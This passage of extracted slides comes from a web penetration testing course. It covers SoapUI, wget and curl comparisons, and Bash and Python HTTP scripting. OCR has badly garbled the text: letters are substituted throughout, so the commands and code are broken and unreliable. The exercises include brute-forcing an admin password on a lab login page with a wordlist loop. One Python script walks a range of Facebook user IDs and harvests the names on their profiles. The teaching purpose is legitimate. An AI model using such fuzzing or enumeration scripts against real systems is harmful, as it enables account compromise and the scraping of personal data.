usr/local/SmarL8ear/soapul-4.3.2/bln/soapul.sh
3. use Soapul's manual requesLer Lo explore how each servlce
works
4. Congure Soapul Lo use your lnLercepuon proxy and record
each requesL and response
3. use your lnLercepuon proxy Lools Lo LesL Lhe lnLerface as you
would any oLher P11 requesL
6. 1ry uslng some of Lhe Lools dlscussed earller ln
class Lo LesL and explolL Lhese web servlces
Mapplng and 1esung Web Servlces
109 Copyright 2012, 2013 Justin Searle www.utilisec.com
Scripting With Bash
110 Copyright 2012, 2013 Justin Searle www.utilisec.com
(#)*"$: Prvo[e nlkl &
Cluseppe Scrlvano
+2)&:
hups://www.gnu.org/
soware/wgeL/
;#$,"%&: Soware package
for reLrlevlng les uslng P11,
P11S and l1. lL ls a non-
lnLeracuve command llne
Lool, so lL may easlly be called
from scrlpLs.
>1-3#13&: C
+6-)18: <see nexL slldes>
(#)*"$: Paxx (1eam)
+2)&: hup://curl.haxx.se
;#$,"%&: curl ls a command
llne Lool for Lransferrlng daLa
wlLh u8L synLax, supporung
ulC1, llLL, l1, l1S,
CCPL8, P11, P11S, lMA,
lMAS, LuA, LuAS, C3,
C3S, 81M, 81S, SC,
Sl1, SM1, SM1S, 1LLnL1
and 1l1.
>1-3#13&: C
+6-)18: <see nexL slldes>
wgeL and curl
111 Copyright 2012, 2013 Justin Searle www.utilisec.com
Comparlng wgeL & curl
8oLh wgeL and curl perform Lhe same baslc funcuons
rlmary advanLage of wgeL: baslc splderlng capablllues
rlmary advanLage of curl: cusLom P11 meLhods
8elow are some slde-by-slde examples, each llne
does Lhe same Lhlng ln each Lool
1ry each of Lhem Lo explore each Lool
wgeL -q -C- hup://dvwa
wgeL hup://dvwa/lndex.php
wgeL --user-agenL "CoogleboL" hup://dvwa
wgeL --posL-daLa "useradmln" hup://dvwa
wgeL --splder -e roboLso -r hup://dvwa
n/A
n/A
n/A
curl hup://dvwa
curl -C hup://dvwa/lndex.php
curl --user-agenL "qualys" hup://dvwa
curl -d "useradmln" hup://dvwa
n/A
curl -fC hup://localhosL/lcons/[a-z][a-z].glf
curl - C1lCnS -v hup://localhosL
curl - 18ACL -v hup://dvwa
112 Copyright 2012, 2013 Justin Searle www.utilisec.com
1. use curl Lo pass Lhe approprlaLe P11 requesL
Lo log lnLo uo[o-8aslc as admln
2. LvaluaLe Lhe P11 response Lo verlfy logln was
successful
uslng Curl on uo[o-8aslc's Logln
113 Copyright 2012, 2013 Justin Searle www.utilisec.com
1. lpe Lhe ouLpuL of your curl logln lnLo grep Lo
search for Lhe approprlaLe success or fallure
sLrlng
2. use curl's @% opuon Lo puL run "sllenL" mode and
remove Lhe requesL sLausucs from Lhe ouLpuL
3. use grep's @& opuon Lo speclc muluple search
sLrlngs for boLh success and fallure
4. use grep's @" opuon Lo show only Lhe
search sLrlng lf found
uslng Crep Lo nd keywords
114 Copyright 2012, 2013 Justin Searle www.utilisec.com
1. lor loops allow us Lo lLeraLe Lhrough a llsL of lLems and
perform acuons wlLh each lLem
for i in {0..19}; do echo -n "Loop "; echo $i; done
2. 1ry wlLh Lhe command above, changlng elemenLs
unul you undersLand how lL works
3. 8eplace Lhe echo loops wlLh your
prevlous curl/grep logln command
uslng lor Loops ln 8ash
Keyword to start the for loop's code block
Creating a number sequence Keyword to end code block
115 Copyright 2012, 2013 Justin Searle www.utilisec.com
1. now replace Lhe {0..19} wlLh Lhe cewl
wordllsL you creaLed earller `cat dojo-
basic.cewl` (uslng backucks) and replace
your password logln value Lo $i Lo fuzz Lhe
password
2. lf LhaL seems Lo work, modlfy your code block
Lo prlnL Lhe auempLed password on Lhe same
llne before your success/fallure message
luzzlng uo[o-8aslc's Logln
116 Copyright 2012, 2013 Justin Searle www.utilisec.com
Scripting With Python
117 Copyright 2012, 2013 Justin Searle www.utilisec.com
re-lnsLalled on Mac and Llnux
Lasy Lo lnsLall on Wlndows
Lasy Lo wrlLe scrlpLs LhaL run on all CSes
Lasy Lo read and collaboraLe
very compleLe seL of sLandard llbrarles
Many sLable and powerful 3rd parLy llbrarles
Why yLhon
118 Copyright 2012, 2013 Justin Searle www.utilisec.com
uslng an lnLeracuve pyLhon shell
Lype pyLhon" on your command llne
Lype pyLhon commands
Lhey execuLe when you hlL enLer
Why use Lhe shell?
Lasy way Lo learn Lhe language
CreaL way Lo debug poruons of code
nlce for oC funcuons and loops
8eyond Lhe baslc shell
Conslder lpyLhon or luLL aer you geL your feeL weL
rovlde rlcher funcuonallLy and producuvlLy
yLhon Shell
119 Copyright 2012, 2013 Justin Searle www.utilisec.com
prlnL('1hls slLe ls proLecLed by SSL.')
answer rawlnpuL('uo you wlsh Lo conunue? ')
lf answer.lower() 'no':
prlnL('Lxlung Lhe program.')
else:
prlnL('Conunulng rogram.')
lnpuL and CuLpuL
Basic output
Basic input
if / then / else
conditional
statements. Notice
the colons followed
by mandatory line
indentions
object oriented bliss
120 Copyright 2012, 2013 Justin Searle www.utilisec.com
#$992BK
P11, P11S, & l1
AuLo arses u8l
lollows 8edlrecuons
uses a Cookle !ar
AuLh: 8aslc & ulgesL
MeLhods: CL1 & CS1
SupporLs roxy Servers
AuLo Closes Connecuons
*G,92B
P11 & P11S
no u8l arslng
uoesn'L lollow 8edlrecLs
uoesn'L SLore Cookles
AuLhenucauon: none
MeLhod: Any
no roxy SupporL
Manually Close Connecuon
A 1ale of 1wo Llbrarles
121 Copyright 2012, 2013 Justin Searle www.utilisec.com
lmporL hupllb
connecuon hupllb.P11Connecuon("secureldeas.neL")
connecuon.requesL("18ACL", "/lndex.hLml")
response connecuon.geLresponse()
payload response.read()
prlnL(payload)
uslng hupllb
Create a connection object
Network request
made here
Extract payload
Extract reponse
Domain only
122 Copyright 2012, 2013 Justin Searle www.utilisec.com
lmporL urlllb2
requesL urlllb2.8equesL('hup://www.uullsec.com')
response urlllb2.urlopen(requesL)
payload response.read()
prlnL(payload)
uslng urlllb2
The library that does the magic
This doesnt make the
request, it simply
packages the request
Dont for get the http://
This sends the request,
catches the response,
and extracts out the
response payload
123 Copyright 2012, 2013 Justin Searle www.utilisec.com
lmporL urlllb2, urlllb
url 'hup://whols.arln.neL/ul/query.do'
daLa 'ushCache' : 'false',
'querylnpuL' : '198.60.22.2'
daLa urlllb.urlencode(daLa)
requesL urlllb2.8equesL(url, daLa)
response urlllb2.urlopen(requesL)
payload response.read()
prlnL(payload)
CS1 8equesLs
If you provide urllib2
with request data, it will
assume a POST
Then urlencode your data
(dont forget to import urllib)
Add your POST
data to a dictionary
124 Copyright 2012, 2013 Justin Searle www.utilisec.com
lmporL urlllb2
url 'hup://google.com/qsamural-wu'
headers 'user-AgenL' : 'Mozllla/3.0 (lhone)'
requesL urlllb2.8equesL(url, none, headers)
response urlllb2.urlopen(requesL)
headers response.headers
prlnL(headers)
Worklng wlLh Peaders
Add your headers to
a dictionary
If you are doing a GET,
use the keyword
"None" for data field
125 Copyright 2012, 2013 Justin Searle www.utilisec.com
lmporL urlllb2
requesL urlllb2.8equesL('hup://www.uullsec.com')
response urlllb2.urlopen(requesL)
payload response.read()
wlLh open('lndex.hLml', 'wb') as le:
le.wrlLe(payload)
Wrlung Lo a llle
Write the response payload to the file
(to read files, use file.read to read the
whole file or file.readline in a loop)
Try opening a file, in
write and binary
modes (use r for read)
126 Copyright 2012, 2013 Justin Searle www.utilisec.com
lmporL urlllb2, re
requesL urlllb2.8equesL('hup://lnguardlans.com/lnfo')
response urlllb2.urlopen(requesL)
payload response.read()
regex r'<dL class"uLle">(.)</dL>'
resulLs re.ndall( regex , payload )
for resulL ln resulLs:
prlnL(resulL)
lllLerlng 8esponses
Build your regex
using a raw string,
grouping desired text
Search payload
for all instances
of your regex
Loop through your results printing them
127 Copyright 2012, 2013 Justin Searle www.utilisec.com
lmporL urlllb2
url 'hup://browserspy.dk/password-ok.php'
username 'LesL'
password 'LesL'
passwordmgr urlllb2.P11asswordMgrWlLhuefaulL8ealm()
passwordmgr.addpassword(none, url, username, password)
auLhhandler urlllb2.P118aslcAuLhPandler(passwordmgr)
opener urlllb2.bulldopener(auLhhandler)
urlllb2.lnsLallopener(opener)
response urlllb2.urlopen(url)
payload response.read()
prlnL( payload )
8aslc AuLhenucauon
Setup needed variables
Setup a password manager
Add passwords
Connect handler
Build and install so all
requests automatically use
the password manager
128 Copyright 2012, 2013 Justin Searle www.utilisec.com
lmporL urlllb2, re
llsL (1333093938 + l for l ln range(0, 20) )
for lLem ln llsL:
url 'hup://m.facebook.com/people/a/' + sLr(lLem)
Lry:
response urlllb2.urlopen(url)
excepL lCLrror:
pass
else:
payload response.read()
regex r'<sLrong>([<])'
maLch re.search(regex, payload)
lf maLch:
name maLch.groups()
slLe response.geLurl().spllL("?")[0]
prlnL("0 1 2".formaL(lLem, name[0], slLe) )
luzzlng and 8ruLe lorce
Create list of 20 Facebook IDs
Prevent missing pages from throwing
an error and stopping the script
Extract name from page
Grab url and remove redirect reference
Format output
129 Copyright 2012, 2013 Justin Searle www.utilisec.com
use Lhe prevlous yLhon examples Lo wrlLe a
scrlpL Lo fuzz admln's password on Lhe uo[o-8aslc
logln page
luzzlng uo[o-8aslc's Logln
130 Copyright 2012, 2013 Justin Searle www.utilisec.com
yLhon Commandllne lnLerface 1emplaLes
hup://code.google.com/p/pyclL
a collecuon of LemplaLes for creaung command llne Lools
greaL Lool for beglnners Lo show how Lo do Lhe baslcs
saves advanced users ume by provldlng baslc plus more
Lach LemplaLes wlll glve you:
8ullL ln command llne argumenLs, easlly modlable
rovldes a help page lf no argumenLs are glven
1racks and dlsplays your scrlpL verslon
verboslLy and debug funcuons wlLh command llne ags
Command llne opuons and funcuons for readlng and wrlung
Lo les
pyCl1
131 Copyright 2012, 2013 Justin Searle www.utilisec.com
CompleLed 1emplaLes
8aslc le read/wrlLe access
Slngle-Lhreaded hup requesLs (baslc wgeL/curl funcuons)
1emplaLes ln rogress
Mulu-Lhreaded hup requesLs (baslc wgeL/curl funcuons)
lanned 1emplaLes
8lnary le read/wrlLe access wlLh hex decode (baslc xxd/
hexdump funcuons)
8aw sockeL cllenL and servlce (baslc neLcaL funcuons)
8aw usb devlce access
lnLeracuve CLl lnLerface
pyCl1 1emplaLes
132 Copyright 2012, 2013 Justin Searle www.utilisec.com
upcomlng Samural-W1l courses:
Check upcomlng 8lackPaL, CWAS, nullcon, 8ruCCn,
8ooLedCCn, nCSC. securlLy conferences
8elaLed courses also LaughL by course auLhors:
SAnS 6-day Web enLesung Course (SLC342)
hups://www.sans.org/course/sec342
SAnS 6-day Advanced Web enLesung Course (SLC642)
hup://www.sans.org/course/sec642
upcomlng Classes
133 Copyright 2012, 2013 Justin Searle www.utilisec.com
!usun Searle
Managlng arLner - uullSec
[usun[meeas.com // [usun[uullsec.com
+1 801 784 2032
[meeas
lnsLrucLor ConLacL lnformauon